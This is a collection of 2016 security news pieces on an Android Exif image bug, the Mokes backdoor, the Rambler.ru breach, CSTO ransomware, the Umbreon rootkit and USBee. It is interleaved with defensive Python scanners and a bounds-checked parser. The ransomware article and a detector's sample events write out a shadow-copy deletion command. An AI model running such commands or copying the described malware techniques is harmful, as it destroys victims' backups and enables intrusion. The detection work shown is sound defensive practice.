“Strazzere told me that as long as an attacker can get a user to open the image file within an affected app – such as Gchat and Gmail – they could either cause a crash or get “remote code execution”; ergo they could effectively place malware on the device and take control of it without the user knowing.” explained Forbes.

The victim doesn’t need to click on the malicious image or on a link, because as soon as its data is parsed by the device the CVE-2016-3862 vulnerability is triggered.

“The problem was made even more severe as a malicious hacker wouldn’t even need the victim to do anything. “Since the bug is triggered without much user interaction – an application only needs to load an image a specific way – triggering the bug is as simple as receiving a message or email from someone. Once that application attempts to parse the image (which was done automatically), the crash is triggered,” Strazzere explained.

What does it mean?

Just one photo containing a generic exploit could silently hack millions of Android devices, in a way similar to the Stagefright exploits that allowed attackers to hack a smartphone with just a simple text message.

“Theoretically, someone could create a generic exploit inside an image to exploits lots of devices. However, due to my skill level, I had to specifically craft each one for the devices. Though once this is done, Gchat, Gmail, most other messengers or social media apps would likely allow this to trigger.”

Strazzere developed the exploits for the affected devices and tested them on Gchat, Gmail and many other messenger and social media apps.

Strazzere did not reveal the names of the other apps affected by the CVE-2016-3862 vulnerability, but he added that the list of vulnerable software includes “privacy-sensitive” tools. Any mobile app using the Android Java object ExifInterface is likely affected.


The vulnerability is similar to last year’s Stagefright bug (exploit code) that allowed hackers to hijack Android devices with just a simple text message without the owners being aware of it.

Android versions from 4.4.4 to 6.0.1 are affected by the CVE-2016-3862 vulnerability, except of course devices that have installed the latest update.

Google has already delivered a patch to fix the vulnerability; as usual, this doesn’t mean that your device has already received it, because patch delivery depends on handset manufacturers and carriers.

So, if you are not running an updated version of Android, you are probably vulnerable to the image-based attack.

Google rewarded Strazzere $4,000 as part of its Android bug bounty and added another $4,000, as the researcher had pledged to give all $8,000 to Girls Garage, a program of the nonprofit Project H Design for girls aged 9-13.

The Missing Piece – Sophisticated OS X Backdoor Discovered
7.9.2016 Kaspersky Vulnerebility

Backdoor.OSX.Mokes.a is the most recently discovered OS X variant of a cross-platform backdoor which is able to operate on all major operating systems (Windows, Linux, OS X). Please see also our analysis on the Windows and Linux variants.
This malware family is able to steal various types of data from the victim’s machine (Screenshots, Audio-/Video-Captures, Office-Documents, Keystrokes)
The backdoor is also able to execute arbitrary commands on the victim’s computer
To communicate it’s using strong AES-256-CBC encryption

Back in January this year we found a new family of cross-platform backdoors for desktop environments. After the discovery of the binaries for Linux and Windows systems, we have now finally come across the OS X version of Mokes.A. It is written in C++ using Qt, a cross-platform application framework, and is statically linked to OpenSSL. This leads to a filesize of approx. 14MB. Let’s have a look into this very fresh sample.

“Unpacked” Backdoor.OSX.Mokes.a

Its filename was “unpacked” when we got our hands on it, but we’re assuming that in-the-wild it comes packed, just like its Linux variant.

Backdoor.OSX.Mokes.a Mach-O x86_64 file type


When executed for the first time, the malware copies itself to the first available of the following locations, in this order:

$HOME/Library/App Store/storeuserd
Corresponding to that location, it creates a plist-file to achieve persistence on the system:

Backdoor.OSX.Mokes.a Persistence plist file

After that it’s time to establish a first connection with its C&C server using HTTP on TCP port 80:

Backdoor.OSX.Mokes.a HTTP Connection dump

The User-Agent string is hardcoded in the binary and the server replies to this “heartbeat” request with “text/html” content of 208 bytes in length. Then the binary establishes an encrypted connection on TCP port 443 using the AES-256-CBC algorithm.

Backdoor.OSX.Mokes.a IDA screenshot _AES_set_encrypt_key

Backdoor functionality

Its next task is to setup the backdoor features:

Backdoor.OSX.Mokes.a IDA screenshot EKomsUserActivity Methods

Capturing Audio
Backdoor.Mokes.a IDA screenshot AudioCaptureSession methods

Monitoring Removable Storage
Backdoor.OSX.Mokes.a IDA screenshot AbRemovableStorageMonitorService Methods

Capturing Screen (every 30 sec.)
Backdoor.OSX.Mokes.a IDA screenshot AbScreenCapture start

Scanning the file system for Office documents (xls, xlsx, doc, docx)
Backdoor.OSX.Mokes.a IDA screenshot hexdump office file filters

The attacker controlling the C&C server is also able to define their own file filters to extend the monitoring of the file system, as well as execute arbitrary commands on the system.

Just like on other platforms, the malware creates several temporary files containing the collected data if the C&C server is not available.

$TMPDIR/ss0-DDMMyy-HHmmss-nnn.sst (Screenshots)
$TMPDIR/aa0-DDMMyy-HHmmss-nnn.aat (Audiocaptures)
$TMPDIR/kk0-DDMMyy-HHmmss-nnn.kkt (Keylogs)
$TMPDIR/dd0-DDMMyy-HHmmss-nnn.ddt (Arbitrary Data)
DDMMyy = date: 070916 = 2016-09-07
HHmmss = time: 154411 = 15:44:11
nnn = milliseconds

If the environment variable $TMPDIR is not defined, “/tmp/” is used as the location (http://doc.qt.io/qt-4.8/qdir.html#tempPath).
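The naming scheme above and the hardcoded heartbeat User-Agent are the two host- and network-side artefacts a responder can search for. The following Python is an added example (not Kaspersky's code) that checks a $TMPDIR listing against the documented scheme, rejecting look-alike names whose prefix/extension pair or embedded DDMMyy-HHmmss timestamp is invalid, and scans proxy log lines for the hardcoded User-Agent; the log line shape and all sample data are constructed here.

```python
import re
from datetime import datetime
from typing import Dict, List, Optional

# Temporary-file naming scheme from the write-up: $TMPDIR/<pp>0-DDMMyy-HHmmss-nnn.<ext>
# (prefix, extension) -> what the file holds
MOKES_FILE_KINDS = {
    ("ss", "sst"): "screenshot",
    ("aa", "aat"): "audio capture",
    ("kk", "kkt"): "keylog",
    ("dd", "ddt"): "arbitrary data",
}
_NAME_RE = re.compile(
    r"^(?P<prefix>ss|aa|kk|dd)0-(?P<date>\d{6})-(?P<time>\d{6})-(?P<ms>\d{3})"
    r"\.(?P<ext>sst|aat|kkt|ddt)$"
)
# Hardcoded User-Agent of the port-80 heartbeat, as listed in the IoC section of the report
MOKES_USER_AGENT = (
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 "
    "(KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
)
_UA_RE = re.compile(r'"([^"]*)"\s*$')   # last double-quoted field of a log line


def parse_mokes_filename(name: str) -> Optional[Dict[str, object]]:
    """Describe a Mokes temp file name, or return None if it does not fit the scheme.

    The shape alone is not enough: prefix and extension must belong together
    (ss <-> sst, ...) and the embedded DDMMyy-HHmmss must be a real timestamp,
    which keeps look-alike names from producing false positives.
    """
    m = _NAME_RE.match(name)
    if not m:
        return None
    kind = MOKES_FILE_KINDS.get((m["prefix"], m["ext"]))
    if kind is None:
        return None
    try:
        ts = datetime.strptime(m["date"] + m["time"], "%d%m%y%H%M%S")
    except ValueError:  # e.g. day 32 or hour 25: not a timestamp Mokes would write
        return None
    return {"kind": kind, "timestamp": ts.replace(microsecond=int(m["ms"]) * 1000)}


def scan_tmp_names(names: List[str]) -> List[Dict[str, object]]:
    """Run parse_mokes_filename over a directory listing and keep the matches."""
    hits = []
    for n in names:
        info = parse_mokes_filename(n)
        if info is not None:
            hits.append({"name": n, **info})
    return hits


def find_mokes_heartbeats(log_lines: List[str]) -> List[str]:
    """Return proxy log lines whose User-Agent equals the hardcoded Mokes string.

    Assumed (constructed) log shape: client method url "user-agent".
    """
    hits = []
    for line in log_lines:
        m = _UA_RE.search(line)
        if m and m.group(1) == MOKES_USER_AGENT:
            hits.append(line)
    return hits


# Constructed sample data: a $TMPDIR listing and a few proxy log lines (not from a real case)
SAMPLE_TMP_LISTING = [
    "ss0-070916-154411-123.sst",   # screenshot written 2016-09-07 15:44:11.123
    "kk0-070916-154412-007.kkt",   # keylog
    "ss0-070916-154411-123.aat",   # mismatched prefix/extension: ignored
    "dd0-320916-154411-001.ddt",   # day 32: ignored
    "com.apple.launchd.abc123",    # unrelated temp entry
]
SAMPLE_PROXY_LOG = [
    '10.0.0.5 GET http://198.51.100.10/ "' + MOKES_USER_AGENT + '"',
    '10.0.0.7 GET http://example.com/ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) '
    'AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"',
]

if __name__ == "__main__":
    for hit in scan_tmp_names(SAMPLE_TMP_LISTING):
        print(hit)
    for line in find_mokes_heartbeats(SAMPLE_PROXY_LOG):
        print("heartbeat-like request:", line)
```

One caveat on the User-Agent check: the string is a copy of what a genuine Safari 7.0.3 on OS X 10.9.3 sends, so a match on its own is a weak signal; a plain-HTTP request on port 80 from a host that then opens a long-lived TCP 443 session to the same server, together with the temp files above, is the combination worth escalating.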

Hints from the author

The author of this malware again left some references to the corresponding source files:

Backdoor.OSX.Mokes.a IDA screenshot Source file references


We detect this type of malware as HEUR:Backdoor.OSX.Mokes.a

Indicators of compromise

File path: $HOME/Library/App Store/storeuserd

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A

Russia's Largest Portal HACKED; Nearly 100 Million Plaintext Passwords Leaked
7.9.2016 thehackernews Hacking
Another data breach from 2012, and this time, it's Russia's biggest internet portal and email provider Rambler.ru.
Rambler.ru, also known as Russia's Yahoo, suffered a massive data breach in 2012 in which an unknown hacker or a group of hackers managed to steal nearly 100 Million user accounts, including their unencrypted plaintext passwords.
The copy of the hacked database obtained by the breach notification website LeakedSource contained details of 98,167,935 Rambler.ru users that were originally stolen on 17 February 2012, but went unreported.
The leaked user records in the database included usernames, email addresses, ICQ numbers (IM chat service), social account details, passwords and some internal data, the data breach indexing site said in a blog post.
The data breach was reported by the same hacker using the daykalif@xmpp.jp Jabber ID who handed LeakedSource over 43.5 Million user records from another 2012 hack suffered by the Last.fm music streaming service.
According to LeakedSource, none of the passwords were hashed, meaning the company stored its users' passwords in unencrypted plain text, which would let the company as well as hackers see passwords easily.
This is something similar to the VK.com breach, in which 171 Million users’ accounts were taken from the Russian social networking site, where passwords were also stored in plaintext format, without any hashing or salting.
Again, as expected, the most common passwords used by Rambler.ru users include "asdasd," "123456," "000000," "654321," "123321," and "123123."
LeakedSource has added the data to its database, so Rambler.ru users can check whether they have been compromised by searching for their account at LeakedSource's search engine.
Rambler.ru is the latest victim to join the list of "Mega-Breaches" revealed in recent months, when hundreds of Millions of online credentials from years-old data breaches on popular services, including LinkedIn, MySpace, VK.com, Tumblr, and Dropbox, were exposed online.
Rambler has yet to respond to the incident.
The Bottom Line:
Users are advised to change the passwords for their Rambler.ru accounts as well as other online accounts immediately, especially where the same passwords are reused.
Moreover, I always encourage users to make use of password managers that create strong and complex passwords for different websites as well as remember them on your behalf.
I have listed some of the best password managers that could help you understand the importance of password manager as well as choose one according to your requirement.

Warning! Just an Image Can Hack Your Android Phone — Patch Now
7.9.2016 thehackernews  Apple
Own an Android smartphone? Beware, as just an innocuous-looking image on social media or messaging app could compromise your smartphone.
Along with the dangerous Quadrooter vulnerabilities that affected 900 Million devices and other previously disclosed issues, Google has patched a previously-unknown critical bug that could let attackers deliver their hack hidden inside an innocent looking image via social media or chat apps.
In fact, there is no need for a victim to click on the malicious photo because as soon as the image’s data was parsed by the phone, it would quietly allow a remote attacker to take control over the device or simply crash it.
The vulnerability is similar to last year's Stagefright bug (exploit code) that allowed hackers to hijack Android devices with just a simple text message without the owners being aware of it.
The Stagefright flaw affected more than 950 Million Android devices and resided in the core Android component Stagefright — a multimedia playback library used by Android to process, record and play multimedia files.
However, the recent vulnerability (CVE-2016-3862) resided in the way images used by certain Android applications parsed the Exif data in an image, SentinelOne's Tim Strazzere, the researcher who uncovered the vulnerability, told Forbes.
Any app using Android's Java object ExifInterface code is likely vulnerable to the issue.
An Image Received...? Your Game is Over
By getting a victim to open the image file within an affected app like Gchat or Gmail, a hacker could either crash the victim's phone or remotely execute malicious code to inject malware and take control of it without the victim’s knowledge.
"Since the bug is triggered without much user interaction – an application only needs to load an image a specific way – triggering the bug is as simple as receiving a message or email from someone," Strazzere said. "Once that application attempts to parse the image (which was done automatically), the crash is triggered."
According to Strazzere, attackers could develop a simple exploit inside an image to target a large number of vulnerable Android devices.
Strazzere crafted exploits for the affected devices and found that it worked on Gchat, Gmail and most other messenger and social media apps, though he did not disclose the names of the other non-Google apps affected by the flaw.
When Can I Expect a Fix?
All versions of Google's operating system from Android 4.4.4 to 6.0.1 are vulnerable to the image-based hack, except today's update that fixed the vulnerability.
The researcher even successfully tested his exploits on a handful of phones running Android 4.2 and Amazon devices and found that the devices remain unpatched, leaving a large number of users of older Android devices exposed.
So, if you are not running an updated version of operating system and/or device, you probably are vulnerable to the image-based attack.
Google has delivered a patch to fix the issue, but given the shaky history of handset manufacturers and carriers rolling out security patches, it is not known how long the companies will take to update vulnerable Android devices.
Google rewarded Strazzere with $8,000 as part of the company's Android bug bounty program.
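Both articles on CVE-2016-3862 (this one and the securityaffairs piece above) say the bug lies in how Exif data is parsed, without describing the root cause. Whatever that cause was, the defensive discipline is the same for any Exif/TIFF parser handling untrusted input: every count, size and offset in the IFD must be checked against the buffer before it is used. The Python below is an added illustration (not Android's ExifInterface and not the researcher's code) of a minimal IFD0 walker that does exactly that, with constructed sample blobs showing a well-formed image, a value pointer far outside the buffer, and an entry count larger than the data actually contains.

```python
import struct
from typing import Dict, Tuple

IfdEntry = Tuple[int, int, bytes]          # (type, count, raw value bytes)


class ExifError(ValueError):
    """Raised for any structurally invalid Exif/TIFF data instead of reading out of bounds."""


# Byte size of each TIFF field type (1 BYTE ... 12 DOUBLE)
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8, 6: 1, 7: 1, 8: 2, 9: 4, 10: 8, 11: 4, 12: 8}
MAX_ENTRIES = 512                          # sanity cap; real IFDs are far smaller
TAG_MAKE, TAG_ORIENTATION = 0x010F, 0x0112


def parse_exif(data: bytes) -> Dict[int, IfdEntry]:
    """Parse IFD0 of an Exif blob. Every offset and length is validated against len(data)."""
    if data.startswith(b"Exif\x00\x00"):   # APP1 payload header used inside JPEG
        data = data[6:]
    if len(data) < 8:
        raise ExifError("too short for a TIFF header")
    if data[:2] == b"II":
        end = "<"
    elif data[:2] == b"MM":
        end = ">"
    else:
        raise ExifError("bad byte-order marker")
    magic, ifd0 = struct.unpack_from(end + "HI", data, 2)
    if magic != 42:
        raise ExifError("bad TIFF magic")
    return _parse_ifd(data, ifd0, end)


def _parse_ifd(data: bytes, offset: int, end: str) -> Dict[int, IfdEntry]:
    if offset < 8 or offset + 2 > len(data):
        raise ExifError(f"IFD offset {offset} outside buffer")
    (count,) = struct.unpack_from(end + "H", data, offset)
    if count > MAX_ENTRIES:
        raise ExifError(f"unreasonable entry count {count}")
    if offset + 2 + count * 12 > len(data):
        raise ExifError("IFD entry table runs past end of buffer")
    entries: Dict[int, IfdEntry] = {}
    pos = offset + 2
    for _ in range(count):
        tag, typ, cnt = struct.unpack_from(end + "HHI", data, pos)
        size = TYPE_SIZES.get(typ)
        if size is None:
            raise ExifError(f"unknown field type {typ} for tag {tag:#06x}")
        total = size * cnt                # in C this product must also be checked for overflow
        if total <= 4:                    # value stored inline in the 4-byte field
            value = data[pos + 8:pos + 8 + total]
        else:                             # field holds an offset to the value
            (voff,) = struct.unpack_from(end + "I", data, pos + 8)
            if voff + total > len(data):  # the out-of-bounds read a careless parser would do
                raise ExifError(f"value of tag {tag:#06x} ({voff}+{total}) outside buffer")
            value = data[voff:voff + total]
        entries[tag] = (typ, cnt, value)
        pos += 12
    return entries


def is_safe_exif(data: bytes) -> bool:
    """True if the blob parses without any bounds violation."""
    try:
        parse_exif(data)
        return True
    except ExifError:
        return False


def build_sample(make_offset: int = 38, entry_count: int = 2) -> bytes:
    """Constructed little-endian Exif blob: IFD0 with Make (ASCII, out-of-line) and Orientation (SHORT, inline)."""
    hdr = b"Exif\x00\x00" + b"II" + struct.pack("<HI", 42, 8)
    ifd = struct.pack("<H", entry_count)
    ifd += struct.pack("<HHII", TAG_MAKE, 2, 6, make_offset)
    ifd += struct.pack("<HHI", TAG_ORIENTATION, 3, 1) + struct.pack("<H", 1) + b"\x00\x00"
    ifd += struct.pack("<I", 0)           # no next IFD
    return hdr + ifd + b"Canon\x00"       # "Canon\0" sits at TIFF offset 38


GOOD_SAMPLE = build_sample()
BAD_OFFSET_SAMPLE = build_sample(make_offset=0x7FFFFFF0)   # Make value pointer far outside the buffer
BAD_COUNT_SAMPLE = build_sample(entry_count=3)             # claims more entries than are present

if __name__ == "__main__":
    for label, blob in (("good", GOOD_SAMPLE), ("bad offset", BAD_OFFSET_SAMPLE), ("bad count", BAD_COUNT_SAMPLE)):
        print(label, "->", "ok" if is_safe_exif(blob) else "rejected")
```

The design point is that rejection happens before any read: the entry table is sized from the count and compared to the buffer once, and each out-of-line value is checked as offset plus length, not offset alone. In a C or Java parser the `size * cnt` product additionally needs an overflow check, which Python's unbounded integers hide.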

CSTO Ransomware, a malware that uses UDP and Google Maps

7.9.2016 securityaffairs Virus

The CSTO ransomware is able to query the Google Maps API to discover the victim’s location and connects to its C&C via UDP.
Ransomware is considered by the security experts one of the most dangerous threats to Internet users and organizations across the world.

Malware authors are developing new malicious codes that implement new features to improve evasion and spreading abilities.

Security researchers at BleepingComputer have reported a new ransomware dubbed Cry or CSTO because it pretends to come from the non-existent organization Central Security Treatment Organization.

The CSTO ransomware was first spotted by the malware researcher MalwareHunterTeam.

Once it has infected a machine, the CSTO ransomware encrypts files and appends the .cry extension to them. Like the Cerber ransomware, CSTO also sends information to its command and control server via UDP.

After infecting a computer, the CSTO ransomware collects information on the host (Windows version, installed service pack, OS version, username, computer name and CPU type) and sends it via UDP to 4096 different IP addresses, only one of which is the C&C server.

The Vxers have chosen the UDP protocol in an attempt to hide the location of the C&C server.

The threat requests the payment of a 1.1 Bitcoins (more than $600) ransom in order to decrypt the files.

The CSTO ransomware has an unusual feature: it leverages websites such as Imgur.com and Pastee.org to host information about victims, and it is able to query the Google Maps API to discover the victim’s location using the SSIDs of nearby wireless networks.

The ransomware uses the WlanGetNetworkBssList function to get the nearby SSIDs and in this way determines the victim’s location, but it is not clear how the malware uses this information.

“Furthermore, it will also use public sites such as Imgur.com and Pastee.org to host information about each of the victims. Last, but not least, it will query the Google Maps API to determine the victim’s location using nearby wireless SSIDs.” reported bleepingcomputer.com.


After encrypting the files, the ransomware uploads the host information along with a list of encrypted files to Imgur.com, compiling all the details into a fake PNG image file and sending it to a certain album.

Imgur, in turn, assigns a unique name to the image file and returns it to the CSTO ransomware, which then broadcasts the filename over UDP to inform the C&C server.

Similar to other ransomware, the Cry ransomware deletes the Shadow Volume Copies using the command vssadmin delete shadows /all /quiet. In this way it prevents victims from restoring the encrypted files.
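The shadow-copy deletion is the one concrete, host-observable action this article names, which makes it a natural detection hook. The Python below is an added example (not from BleepingComputer's analysis) that flags process-creation events running vssadmin delete shadows; the event shape (pid|image|command line) and all sample events are constructed here. Matching is done on tokens rather than a substring, so casing, a full path to the binary, quoting, argument order (/quiet /all versus /all /quiet) and a cmd.exe /c wrapper do not defeat it.

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation events in a simple "pid|image|command line" shape
# (shape assumed here; adapt parse_event to your own EDR/Sysmon export)
SAMPLE_EVENTS = [
    "4120|C:\\Windows\\System32\\vssadmin.exe|vssadmin delete shadows /all /quiet",
    '4188|C:\\Windows\\System32\\cmd.exe|cmd.exe /c "C:\\Windows\\System32\\VSSADMIN.EXE" Delete Shadows /Quiet /All',
    "4200|C:\\Windows\\System32\\vssadmin.exe|vssadmin list shadows",
    "4310|C:\\Windows\\System32\\vssadmin.exe|vssadmin delete shadows /for=C: /oldest",
    "4400|C:\\Program Files\\Backup\\backup.exe|backup.exe --full --target E:\\",
]

_TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def parse_event(line: str) -> Dict[str, object]:
    pid, image, cmdline = line.split("|", 2)
    return {"pid": int(pid), "image": image, "cmdline": cmdline}


def _tokens(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted paths together."""
    return [t.strip('"') for t in _TOKEN_RE.findall(cmdline)]


def _program_name(token: str) -> str:
    """'C:\\Windows\\System32\\VSSADMIN.EXE' -> 'vssadmin'."""
    name = token.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def shadow_copy_deletion(cmdline: str) -> Optional[Dict[str, object]]:
    """Return details if the command line runs 'vssadmin delete shadows', else None."""
    toks = _tokens(cmdline)
    for i, tok in enumerate(toks):
        if _program_name(tok) != "vssadmin":
            continue
        args = [a.lower() for a in toks[i + 1:]]
        if len(args) >= 2 and args[0] == "delete" and args[1] == "shadows":
            return {"scope": "all" if "/all" in args else "selected", "quiet": "/quiet" in args}
    return None


def detect_shadow_deletion(events: List[str]) -> List[Dict[str, object]]:
    """Run the check over process-creation events and return the matching ones."""
    hits = []
    for line in events:
        ev = parse_event(line)
        match = shadow_copy_deletion(str(ev["cmdline"]))
        if match:
            hits.append({**ev, **match})
    return hits


if __name__ == "__main__":
    for hit in detect_shadow_deletion(SAMPLE_EVENTS):
        print(f"pid {hit['pid']}: shadow copies deleted (scope={hit['scope']}, quiet={hit['quiet']})")
```

Backup and disk-cleanup tools occasionally run the same command, so a hit is a high-priority triage item rather than an automatic verdict; the parent process and the user account that launched it usually settle it quickly.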

The threat achieves persistence by creating a randomly named scheduled task that is triggered every time the user logs into Windows. The task also drops ransom notes on the desktop of the infected machine.

The ransom note includes instructions on how to access the Tor network to reach the payment site used by the authors.

“The ransom notes created by the Central Security Treatment Organization Ransomware contain links to a TOR payment site that has a Window title of User Cabinet. When a user visits this site, they will be prompted to login using the personal code from their ransom note.” continues bleepingcomputer.com.

The payment site includes a support page and offers victims the possibility to decrypt just one file for free, as proof that all the locked files can be decrypted.

The researchers tested the free decryption feature, but it failed, another good reason to avoid paying the ransom.

Pokemon-fan VXer developed the Linux Umbreon rootkit
6.9.2016 securityaffairs Virus

Security researchers from TrendMicro have published an interesting analysis on the Linux Umbreon rootkit, a new malware developed by a Pokemon-fan VXer.
Malware researchers from TrendMicro have obtained samples of a new strain of Linux rootkit from one of its trusted partners.

The new rootkit family was called Umbreon (ELF_UMBREON family), after one of the Pokémon characters. It targets Linux systems, including embedded devices and any other system running Intel or ARM processors.

According to the experts, the Umbreon rootkit was developed in early 2015 by a VXer who has been active in the cybercriminal underground since at least 2013. Posts on criminal underground forums claim that Umbreon is very effective at evading detection.

“Rootkits are persistent threats intended to be hard to detect/observe. Its main purpose is to keep itself (and other malware threats) stealthed and totally hidden from administrators, analysts, users, scanning, forensic, and system tools.” Trend Micro senior threat researcher Fernando Mercês says. “They may also open a backdoor and/or use a C&C server and provide an attacker ways to control and spy on the affected machine.”

Umbreon is classified as a ring 3 rootkit (or user-mode rootkit) because it works in user mode (ring 3): it does not install kernel objects onto the system, but hooks functions from core libraries that various applications use as an intermediary layer to system calls.

“[Umbreon] hooks functions from core libraries that are used by programs as interfaces to system calls that run important operations in a system such as reading/writing files, spawning processes, or sending packets over the network. It is perfectly possible to spy on and change the way things are done within an operating system, even from user mode.”

Once it has compromised the targeted system, the rootkit creates a valid Linux user that attackers can use to access it via any authentication method supported by Linux through pluggable authentication modules (PAM), including SSH.

The researchers from TrendMicro focused their analysis on the Espeon backdoor component, a non-promiscuous libpcap-based backdoor written in C that spawns a shell when an authenticated user connects to it. (The attackers also named this component after a Pokémon.)

Once again, the author used the name of a Pokémon for one of the components. Espeon lets the attacker establish a connection back to the attacker's machine, working as a reverse shell to bypass firewalls.

Espeon is able to capture all the traffic from the Ethernet interface of the infected machine.

To remove the Umbreon rootkit from an infected system, boot from a Linux live CD and follow these steps:

Mount the partition where the /usr directory is located; write privileges are required.
Backup all the files before making any changes.
Remove the file /etc/ld.so.<random>.
Remove the directory /usr/lib/libc.so.<random>.
Restore the attributes of the files /usr/share/libc.so.<random>.<arch>.*.so and remove them as well.
Patch the loader library to use /etc/ld.so.preload again.
Unmount the partition and reboot the system normally.
The procedure is feasible because Umbreon is a ring 3 (user-level) rootkit: nothing of it lives in the kernel, so its files can be cleaned from the mounted partition.

In order to detect the Umbreon Rootkit it is possible to use the YARA rules published by TrendMicro.
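The removal steps above also tell a responder what to look for before touching anything. The script below is an added example, not Trend Micro's YARA rules or tooling: given the mount point of the suspect system, it looks for the artifacts the steps name (an extra /etc/ld.so.<random> file, a /usr/lib/libc.so.<random> directory, shared objects named libc.so.<random>.<arch>.*.so under /usr/share, and a dynamic loader whose preload path string no longer reads /etc/ld.so.preload). The loader location (lib*/ld-*) and the presence of the literal string /etc/ld.so.preload in a clean loader are assumptions of the example; the demo tree it scans is constructed in a temporary directory.

```python
"""Scan a mounted root for the Umbreon artifacts listed in the removal steps.

Added example, not Trend Micro's tooling. Assumptions: the dynamic loader is any
regular file matching lib*/ld-* under the root, and a clean loader contains the
literal string "/etc/ld.so.preload". The demo root is constructed below.
"""
import re
import tempfile
from pathlib import Path

# Legitimate /etc/ld.so.* names on common distributions.
KNOWN_ETC_LDSO = {"ld.so.cache", "ld.so.conf", "ld.so.conf.d", "ld.so.preload", "ld.so.nohwcap"}
# /etc/ld.so.<name> strings expected inside a clean glibc loader.
KNOWN_LOADER_NAMES = {b"cache", b"preload", b"nohwcap"}
# Matches /usr/share/libc.so.<random>.<arch>.*.so
FAKE_LIBC_RE = re.compile(r"^libc\.so\.[A-Za-z0-9]+\.[A-Za-z0-9_-]+\..*\.so$")


def scan_umbreon_artifacts(root):
    """Return sorted (category, path) findings for a system mounted at `root`."""
    root = Path(root)
    findings = []

    etc = root / "etc"
    if etc.is_dir():
        for entry in etc.iterdir():
            # The patched loader reads /etc/ld.so.<random> instead of ld.so.preload.
            if entry.name.startswith("ld.so.") and entry.name not in KNOWN_ETC_LDSO:
                findings.append(("preload-file", str(entry)))

    usr_lib = root / "usr" / "lib"
    if usr_lib.is_dir():
        for entry in usr_lib.iterdir():
            # libc.so.* is a file or symlink on a clean system, never a directory.
            if entry.name.startswith("libc.so.") and entry.is_dir():
                findings.append(("libc-dir", str(entry)))

    usr_share = root / "usr" / "share"
    if usr_share.is_dir():
        for entry in usr_share.iterdir():
            # Shared objects do not belong in /usr/share (architecture-independent data).
            if FAKE_LIBC_RE.match(entry.name):
                findings.append(("fake-libc", str(entry)))

    for loader in root.glob("lib*/ld-*"):
        if not loader.is_file():
            continue
        names = set(re.findall(rb"/etc/ld\.so\.([A-Za-z0-9_]+)", loader.read_bytes()))
        if b"preload" not in names:
            findings.append(("loader-no-preload", str(loader)))
        for name in sorted(names - KNOWN_LOADER_NAMES):
            findings.append(("loader-patched", f"{loader} reads /etc/ld.so.{name.decode()}"))
    return sorted(findings)


def build_demo_root(infected):
    """Construct a minimal root tree; infected=True plants the described artifacts."""
    root = Path(tempfile.mkdtemp(prefix="umbreon-demo-"))
    for d in ("etc", "usr/lib", "usr/share", "lib"):
        (root / d).mkdir(parents=True)
    (root / "etc" / "ld.so.cache").write_bytes(b"")
    (root / "etc" / "ld.so.conf").write_text("include /etc/ld.so.conf.d/*.conf\n")
    (root / "usr" / "lib" / "libc.so.6").write_bytes(b"\x7fELF")
    loader = root / "lib" / "ld-linux-armhf.so.3"
    if not infected:
        loader.write_bytes(b"\x7fELF\x00/etc/ld.so.cache\x00/etc/ld.so.preload\x00")
        return root
    rnd = "kmrw3"  # constructed stand-in for the <random> component
    (root / "etc" / f"ld.so.{rnd}").write_text(f"/usr/lib/libc.so.{rnd}/libc.so.6\n")
    (root / "usr" / "lib" / f"libc.so.{rnd}").mkdir()
    (root / "usr" / "share" / f"libc.so.{rnd}.armv7l.rk.so").write_bytes(b"\x7fELF")
    # Patched loader: the preload path string now names the random file.
    loader.write_bytes(b"\x7fELF\x00/etc/ld.so.cache\x00/etc/ld.so." + rnd.encode() + b"\x00")
    return root


if __name__ == "__main__":
    for category, path in scan_umbreon_artifacts(build_demo_root(infected=True)):
        print(f"{category:18s} {path}")
```

On a real case, call scan_umbreon_artifacts with the mount point of the suspect partition (for instance /mnt) instead of the demo tree; a clean system returns an empty list. Findings in the loader-patched category identify the file that step 3 of the removal procedure must delete.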

This Malware Can Transfer Data via USB Emissions from Air-Gapped Computers
6.9.2016 thehackernews Virus
Air-gapped computers, which are isolated from the Internet and other networks and are believed to be the most secure computers on the planet, have become a regular target in recent years.
A team of researchers from Ben-Gurion University in Israel has discovered a way to extract sensitive information from air-gapped computers – this time using radio frequency transmissions from USB connectors without any need of specialized hardware mounted on the USB.
Dubbed USBee, the attack is a significant improvement over the NSA-made USB exfiltrator called CottonMouth that was mentioned in a document leaked by former NSA employee Edward Snowden.
Unlike CottonMouth, USBee doesn't require an attacker to smuggle a modified USB device into the facility housing the targeted air-gapped computer; rather, the technique turns USB devices already inside the facility into an RF transmitter with no hardware modification.
Moreover, USBee does not involve any implant in USB firmware and drivers to execute the attack.
"We introduce a software-only method for short-range data exfiltration using electromagnetic emissions from a USB dongle," researchers wrote in a research paper published Monday. "Unlike other methods, our method doesn't require any [RF] transmitting hardware since it uses the USB's internal data bus."
The researchers stress that the USBee attack method is based solely on software, though certain conditions must be met for it to work:
The protected computer must be infected with the malware, most probably, with the help of an insider.
Any USB device must be plugged into that infected air-gapped computer.
The attacker has to be near the compromised device, usually at maximum 3-5 meters.
USBee turns the targeted computer's USB ports into mini Radio Frequency (RF) transmitters by modulating the data fed at high-speed to plugged-in devices.
USBee will then send a string of '0' bits to a USB port in such a way that makes the device generate detectable emissions between 240MHz and 480MHz frequencies, according to Mordechai Guri, one of the researchers.
Now, by writing sequences of '0' and '1', attackers can generate a carrier wave from the rapid voltage changes and then use binary frequency shift keying (B-FSK) to encode useful data.
Since the attack is meant to steal binary data, attackers wouldn’t be able to steal any large files, but could get their hands on keys, passwords, and other small bits of sensitive data stored on the targeted computer.
USBee transmits data at about 80 bytes per second, which is fast enough to steal a 4096-bit decryption key in less than 10 seconds.

The USBee malware offers ranges of around 9 feet when data is beamed over a USB thumb drive to 26 feet when the USB device uses a short cable that acts as a transmitting antenna.
The researchers' attack method sounds really impressive, but it is still a theoretical attack, although one that could be deployed in real-world scenarios and be effective.
